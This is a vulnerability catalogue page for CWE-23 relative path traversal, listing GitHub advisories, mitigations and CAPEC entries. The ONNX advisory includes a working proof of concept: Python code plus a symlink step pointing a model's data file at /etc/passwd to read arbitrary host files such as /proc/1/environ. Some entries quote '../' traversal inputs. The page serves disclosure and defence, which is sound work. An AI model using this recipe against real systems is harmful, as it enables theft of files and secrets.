CWE-23
AllowedRelative Path Traversal
Abstraction: Base · Status: Draft
The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.
778 vulnerabilities reference this CWE, most recent first.
GHSA-3MW5-7HQ7-6P5W
Vulnerability from github – Published: 2025-03-11 21:30 – Updated: 2025-03-11 21:30NVIDIA Nemo Framework contains a vulnerability where a user could cause a relative path traversal issue by arbitrary file write. A successful exploit of this vulnerability may lead to code execution and data tampering.
{
"affected": [],
"aliases": [
"CVE-2025-23360"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-11T20:15:16Z",
"severity": "HIGH"
},
"details": "NVIDIA Nemo Framework contains a vulnerability where a user could cause a relative path traversal issue by arbitrary file write. A successful exploit of this vulnerability may lead to code execution and data tampering.",
"id": "GHSA-3mw5-7hq7-6p5w",
"modified": "2025-03-11T21:30:35Z",
"published": "2025-03-11T21:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23360"
},
{
"type": "WEB",
"url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5623"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-3PWM-MF62-VQ4P
Vulnerability from github – Published: 2025-01-05 18:30 – Updated: 2025-01-05 18:30A vulnerability classified as problematic was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this vulnerability is an unknown functionality of the file /setting/ClassFy/exampleDownload.html. The manipulation of the argument name leads to path traversal: '/../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{
"affected": [],
"aliases": [
"CVE-2025-0225"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-01-05T17:15:06Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as problematic was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this vulnerability is an unknown functionality of the file /setting/ClassFy/exampleDownload.html. The manipulation of the argument name leads to path traversal: \u0027/../filedir\u0027. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.",
"id": "GHSA-3pwm-mf62-vq4p",
"modified": "2025-01-05T18:30:35Z",
"published": "2025-01-05T18:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0225"
},
{
"type": "WEB",
"url": "https://github.com/BxYQ/ld/blob/main/file_read4/poc.py"
},
{
"type": "WEB",
"url": "https://github.com/BxYQ/ld/tree/main/file_read4"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.290215"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.290215"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.474264"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-3R7Q-94C4-JM45
Vulnerability from github – Published: 2025-09-16 15:32 – Updated: 2025-09-16 15:32A path traversal in the Control-M/Agent can lead to a local privilege escalation when an attacker has access to the system running the Agent. This vulnerability impacts the out-of-support Control-M/Agent versions 9.0.18 to 9.0.20 and potentially earlier unsupported versions. This vulnerability was fixed in 9.0.20.100 and above.
{
"affected": [],
"aliases": [
"CVE-2025-55115"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-09-16T13:16:08Z",
"severity": "CRITICAL"
},
"details": "A path traversal in the Control-M/Agent can lead to a local privilege escalation when an attacker has access to the system running the Agent. This vulnerability impacts the out-of-support Control-M/Agent versions 9.0.18 to 9.0.20 and potentially earlier unsupported versions. This vulnerability was fixed in 9.0.20.100 and above.",
"id": "GHSA-3r7q-94c4-jm45",
"modified": "2025-09-16T15:32:36Z",
"published": "2025-09-16T15:32:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55115"
},
{
"type": "WEB",
"url": "https://bmcapps.my.site.com/casemgmt/sc_KnowledgeArticle?sfdcid=000441969"
},
{
"type": "WEB",
"url": "https://bmcapps.my.site.com/casemgmt/sc_KnowledgeArticle?sfdcid=000442099"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-3R9X-F23J-GC73
Vulnerability from github – Published: 2026-03-31 22:34 – Updated: 2026-04-06 16:43Summary
A path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory.
Details
The following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system: https://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033
std::filesystem::is_regular_file performs a status(p) call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file.
PoC
# Create a demo model with external data
import os
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper
def create_onnx_model(output_path="model.onnx"):
weight_matrix = np.random.randn(1000, 1000).astype(np.float32)
X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 1000])
Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 1000])
W = numpy_helper.from_array(weight_matrix, name="W")
matmul_node = helper.make_node("MatMul", inputs=["X", "W"], outputs=["Y"], name="matmul")
graph = helper.make_graph(
nodes=[matmul_node],
name="SimpleModel",
inputs=[X],
outputs=[Y],
initializer=[W]
)
model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 11)])
onnx.checker.check_model(model)
data_file = output_path.replace('.onnx', '.data')
if os.path.exists(output_path):
os.remove(output_path)
if os.path.exists(data_file):
os.remove(data_file)
onnx.save_model(
model,
output_path,
save_as_external_data=True,
all_tensors_to_one_file=True,
location=os.path.basename(data_file),
size_threshold=1024 * 1024
)
if __name__ == "__main__":
create_onnx_model("model.onnx")
- Run the above code to generate a sample model with external data.
- Remove
model.data - Run
ln -s /etc/passwd model.data - Load the model using the following code
- Observe check for symlink is bypassed and model is succesfuly loaded
import onnx
from onnx.external_data_helper import load_external_data_for_model
def load_onnx_model_basic(model_path="model.onnx"):
model = onnx.load(model_path)
return model
def load_onnx_model_explicit(model_path="model.onnx"):
model = onnx.load(model_path, load_external_data=False)
load_external_data_for_model(model, ".")
return model
if __name__ == "__main__":
model = load_onnx_model_basic("model.onnx")
A common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing poc.onnx and poc.data (symlink). Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.
Impact
Read sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.
NOTE: this issue is not limited to UNIX.
Sample patch
#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>
int open_external_file_no_symlink(const char *base_dir,
const char *relative_path) {
int dirfd = -1;
int fd = -1;
struct stat st;
// Open base directory
dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);
if (dirfd < 0) {
return -1;
}
// Open the target relative to base_dir
// O_NOFOLLOW => fail if final path component is a symlink
fd = openat(dirfd,
relative_path,
O_RDONLY | O_NOFOLLOW);
close(dirfd);
if (fd < 0) {
// ELOOP is the typical error if a symlink is encountered
return -1;
}
// Inspect the *opened file*
if (fstat(fd, &st) != 0) {
close(fd);
return -1;
}
// Enforce "regular file only"
if (!S_ISREG(st.st_mode)) {
close(fd);
errno = EINVAL;
return -1;
}
// fd is now:
// - not a symlink
// - not a directory
// - not a device / FIFO / socket
// - race-safe
return fd;
}
Resources
- https://cwe.mitre.org/data/definitions/61.html
- https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172
- https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.20.0"
},
"package": {
"ecosystem": "PyPI",
"name": "onnx"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.21.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27489"
],
"database_specific": {
"cwe_ids": [
"CWE-23",
"CWE-61"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-31T22:34:25Z",
"nvd_published_at": "2026-04-01T18:16:28Z",
"severity": "HIGH"
},
"details": "### Summary\nA path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. \n\n### Details\nThe following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system:\nhttps://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033\n\n`std::filesystem::is_regular_file` performs a `status(p)` call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file. \n\n\n### PoC\n\n\n\n```python\n# Create a demo model with external data\nimport os\nimport numpy as np\nimport onnx\nfrom onnx import helper, TensorProto, numpy_helper\n\ndef create_onnx_model(output_path=\"model.onnx\"):\n weight_matrix = np.random.randn(1000, 1000).astype(np.float32)\n\n X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 1000])\n Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 1000])\n W = numpy_helper.from_array(weight_matrix, name=\"W\")\n\n matmul_node = helper.make_node(\"MatMul\", inputs=[\"X\", \"W\"], outputs=[\"Y\"], name=\"matmul\")\n\n graph = helper.make_graph(\n nodes=[matmul_node],\n name=\"SimpleModel\",\n inputs=[X],\n outputs=[Y],\n initializer=[W]\n )\n\n model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 11)])\n onnx.checker.check_model(model)\n\n data_file = output_path.replace(\u0027.onnx\u0027, \u0027.data\u0027)\n\n if os.path.exists(output_path):\n os.remove(output_path)\n if os.path.exists(data_file):\n os.remove(data_file)\n\n onnx.save_model(\n model,\n output_path,\n save_as_external_data=True,\n all_tensors_to_one_file=True,\n location=os.path.basename(data_file),\n size_threshold=1024 * 1024\n )\n\nif __name__ == \"__main__\":\n create_onnx_model(\"model.onnx\")\n```\n\n1. Run the above code to generate a sample model with external data.\n2. Remove `model.data`\n3. Run `ln -s /etc/passwd model.data`\n4. Load the model using the following code\n5. Observe check for symlink is bypassed and model is succesfuly loaded\n\n```python\nimport onnx\nfrom onnx.external_data_helper import load_external_data_for_model\n\ndef load_onnx_model_basic(model_path=\"model.onnx\"):\n model = onnx.load(model_path)\n return model\n\ndef load_onnx_model_explicit(model_path=\"model.onnx\"):\n model = onnx.load(model_path, load_external_data=False)\n load_external_data_for_model(model, \".\")\n return model\n\nif __name__ == \"__main__\":\n model = load_onnx_model_basic(\"model.onnx\")\n\n```\n\nA common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing `poc.onnx` and `poc.data (symlink)`. Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.\n\n\n### Impact\n\nRead sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.\n\nNOTE: this issue is not limited to UNIX.\n\n### Sample patch\n\n```c\n#include \u003cfcntl.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\nint open_external_file_no_symlink(const char *base_dir,\n const char *relative_path) {\n int dirfd = -1;\n int fd = -1;\n struct stat st;\n\n // Open base directory\n dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);\n if (dirfd \u003c 0) {\n return -1;\n }\n\n // Open the target relative to base_dir\n // O_NOFOLLOW =\u003e fail if final path component is a symlink\n fd = openat(dirfd,\n relative_path,\n O_RDONLY | O_NOFOLLOW);\n close(dirfd);\n\n if (fd \u003c 0) {\n // ELOOP is the typical error if a symlink is encountered\n return -1;\n }\n\n // Inspect the *opened file*\n if (fstat(fd, \u0026st) != 0) {\n close(fd);\n return -1;\n }\n\n // Enforce \"regular file only\"\n if (!S_ISREG(st.st_mode)) {\n close(fd);\n errno = EINVAL;\n return -1;\n }\n\n // fd is now:\n // - not a symlink\n // - not a directory\n // - not a device / FIFO / socket\n // - race-safe\n return fd;\n}\n```\n\n### Resources\n\n* https://cwe.mitre.org/data/definitions/61.html\n* https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172\n* https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368",
"id": "GHSA-3r9x-f23j-gc73",
"modified": "2026-04-06T16:43:13Z",
"published": "2026-03-31T22:34:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27489"
},
{
"type": "WEB",
"url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb"
},
{
"type": "PACKAGE",
"url": "https://github.com/onnx/onnx"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "onnx Vulnerable to Path Traversal via Symlink"
}
GHSA-3WXQ-76W9-GHCP
Vulnerability from github – Published: 2024-02-06 12:30 – Updated: 2025-05-15 21:31In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives
{
"affected": [],
"aliases": [
"CVE-2024-24940"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-02-06T10:15:10Z",
"severity": "LOW"
},
"details": "In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives",
"id": "GHSA-3wxq-76w9-ghcp",
"modified": "2025-05-15T21:31:19Z",
"published": "2024-02-06T12:30:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24940"
},
{
"type": "WEB",
"url": "https://www.jetbrains.com/privacy-security/issues-fixed"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-42MW-CPGW-C7MF
Vulnerability from github – Published: 2023-02-26 15:30 – Updated: 2023-03-03 06:30A vulnerability was found in MuYuCMS 2.2. It has been classified as problematic. Affected is an unknown function of the file /editor/index.php. The manipulation of the argument dir_path leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221802 is the identifier assigned to this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2023-1043"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-02-26T13:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability was found in MuYuCMS 2.2. It has been classified as problematic. Affected is an unknown function of the file /editor/index.php. The manipulation of the argument dir_path leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221802 is the identifier assigned to this vulnerability.",
"id": "GHSA-42mw-cpgw-c7mf",
"modified": "2023-03-03T06:30:17Z",
"published": "2023-02-26T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1043"
},
{
"type": "WEB",
"url": "https://github.com/MuYuCMS/MuYuCMS/issues/4"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.221802"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.221802"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-4365-FHM5-QCRX
Vulnerability from github – Published: 2021-10-22 16:19 – Updated: 2024-10-16 20:45Impact
An Archive Extraction (Zip Slip) vulnerability in the functionality that allows a user to load a trained model archive in Rasa 2.8.9 and older allows an attacker arbitrary write capability within specific directories using a malicious crafted archive file.
Patches
The vulnerability is fixed in Rasa 2.8.10
Workarounds
Mitigating steps for vulnerable end users are to ensure that they do not upload untrusted model files, and restrict CLI or API endpoint access where a malicious actor could target a deployed Rasa instance.
For more information
If you have any questions or comments about this advisory: * Email the Rasa Security Team
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "rasa"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.10"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-41127"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2021-10-21T20:32:19Z",
"nvd_published_at": "2021-10-21T21:15:00Z",
"severity": "HIGH"
},
"details": "### Impact\nAn Archive Extraction (Zip Slip) vulnerability in the functionality that allows a user to load a trained model archive in Rasa 2.8.9 and older allows an attacker arbitrary write capability within specific directories using a malicious crafted archive file.\n\n### Patches\nThe vulnerability is fixed in Rasa 2.8.10\n\n### Workarounds\nMitigating steps for vulnerable end users are to ensure that they do not upload untrusted model files, and restrict CLI or API endpoint access where a malicious actor could target a deployed Rasa instance.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email [the Rasa Security Team](mailto:security@rasa.com)\n",
"id": "GHSA-4365-fhm5-qcrx",
"modified": "2024-10-16T20:45:22Z",
"published": "2021-10-22T16:19:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/RasaHQ/rasa/security/advisories/GHSA-4365-fhm5-qcrx"
},
{
"type": "WEB",
"url": "https://github.com/RasaHQ/rasa/commit/1b6b502f52d73b4f8cd1959ce724b8ad0eb33989"
},
{
"type": "PACKAGE",
"url": "https://github.com/RasaHQ/rasa"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/rasa/PYSEC-2021-381.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Maliciously Crafted Model Archive Can Lead To Arbitrary File Write"
}
GHSA-4397-Q3R3-9665
Vulnerability from github – Published: 2024-10-14 03:30 – Updated: 2024-10-14 03:30The Team+ from TEAMPLUS TECHNOLOGY does not properly validate a specific page parameter, allowing unauthenticated remote attackers to exploit this vulnerability to read arbitrary system files.
{
"affected": [],
"aliases": [
"CVE-2024-9922"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-10-14T03:15:10Z",
"severity": "HIGH"
},
"details": "The Team+ from TEAMPLUS TECHNOLOGY does not properly validate a specific page parameter, allowing unauthenticated remote attackers to exploit this vulnerability to read arbitrary system files.",
"id": "GHSA-4397-q3r3-9665",
"modified": "2024-10-14T03:30:44Z",
"published": "2024-10-14T03:30:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9922"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/en/cp-139-8127-41699-2.html"
},
{
"type": "WEB",
"url": "https://www.twcert.org.tw/tw/cp-132-8126-5d9d2-1.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-44G9-W23C-5RW7
Vulnerability from github – Published: 2020-08-31 22:53 – Updated: 2021-09-23 20:57All versions of the static file server module nhouston are vulnerable to directory traversal. An attacker can provide input such as ../ to read files outside of the served directory.
Recommendation
It is recommended that a different module be used, as we have been unable to reacher the maintainer of this module. We will continue to reach out to them, and if an update becomes available that fixes the issue, we will update this advisory accordingly.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nhouston"
},
"ranges": [
{
"events": [
{
"introduced": "0.0.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2014-8883"
],
"database_specific": {
"cwe_ids": [
"CWE-23"
],
"github_reviewed": true,
"github_reviewed_at": "2020-08-31T18:08:17Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "All versions of the static file server module nhouston are vulnerable to directory traversal. An attacker can provide input such as `../` to read files outside of the served directory.\n\n\n## Recommendation\n\nIt is recommended that a different module be used, as we have been unable to reacher the maintainer of this module. We will continue to reach out to them, and if an update becomes available that fixes the issue, we will update this advisory accordingly.",
"id": "GHSA-44g9-w23c-5rw7",
"modified": "2021-09-23T20:57:48Z",
"published": "2020-08-31T22:53:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-8883"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/npm:nhouston:20141114"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/25"
},
{
"type": "WEB",
"url": "http://en.wikipedia.org/wiki/Directory_traversal_attack"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Directory Traversal in nhouston"
}
GHSA-45P5-8Q33-98HW
Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32A path traversal vulnerability exists in the 'document uploads manager' feature of mintplex-labs/anything-llm, affecting the latest version prior to 1.2.2. This vulnerability allows users with the 'manager' role to access and manipulate the 'anythingllm.db' database file. By exploiting the vulnerable endpoint '/api/document/move-files', an attacker can move the database file to a publicly accessible directory, download it, and subsequently delete it. This can lead to unauthorized access to sensitive data, privilege escalation, and potential data loss.
{
"affected": [],
"aliases": [
"CVE-2024-10513"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-23"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-03-20T10:15:17Z",
"severity": "HIGH"
},
"details": "A path traversal vulnerability exists in the \u0027document uploads manager\u0027 feature of mintplex-labs/anything-llm, affecting the latest version prior to 1.2.2. This vulnerability allows users with the \u0027manager\u0027 role to access and manipulate the \u0027anythingllm.db\u0027 database file. By exploiting the vulnerable endpoint \u0027/api/document/move-files\u0027, an attacker can move the database file to a publicly accessible directory, download it, and subsequently delete it. This can lead to unauthorized access to sensitive data, privilege escalation, and potential data loss.",
"id": "GHSA-45p5-8q33-98hw",
"modified": "2025-03-20T12:32:39Z",
"published": "2025-03-20T12:32:39Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10513"
},
{
"type": "WEB",
"url": "https://github.com/mintplex-labs/anything-llm/commit/47a5c7126c20e2277ee56e2c7ee11990886a40a7"
},
{
"type": "WEB",
"url": "https://huntr.com/bounties/ad11cecf-161a-4fb1-986f-6f88272cbb9e"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
Mitigation MIT-5.1
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
- When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
- Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20.1
Strategy: Input Validation
- Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
- Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
- realpath() in C
- getCanonicalPath() in Java
- GetFullPath() in ASP.NET
- realpath() or abs_path() in Perl
- realpath() in PHP
Mitigation MIT-29
Strategy: Firewall
Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].
CAPEC-139: Relative Path Traversal
An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.
CAPEC-76: Manipulating Web Input to File System Calls
An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.